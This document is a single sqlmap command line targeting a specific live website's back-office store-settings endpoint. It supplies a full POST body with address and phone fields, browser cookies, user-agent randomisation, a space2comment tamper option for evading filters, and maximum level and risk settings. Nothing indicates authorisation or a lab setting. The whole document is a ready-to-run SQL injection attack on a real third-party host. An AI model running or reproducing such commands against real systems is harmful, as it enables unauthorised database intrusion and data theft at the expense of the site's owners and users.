sqlmap.py -u https://backoffice.woogigs.com/operational/business/set_setting_store --method "POST" --data "business=7477&name=wewe3341&address=JL.Selatan+IV+Komplek+Jatinang&phone=083156984321&information=&color_primary=%233B97D2&color_text=%23ffffff&monday=&tuesday=&wednesday=&thursday=&friday=&saturday=&sunday=" --cookie "_ga_GP10RNSTRZ=GS1.1.1688744803.1.1.1688745837.0.0.0; _ga=GA1.1.1619842495.1688744804; theme=light; _ga_49TXT24YTZ=GS1.1.1689420794.3.1.1689421155.0.0.0" --random-agent --tamper=space2comment --level 3 --risk 3 --threads=10



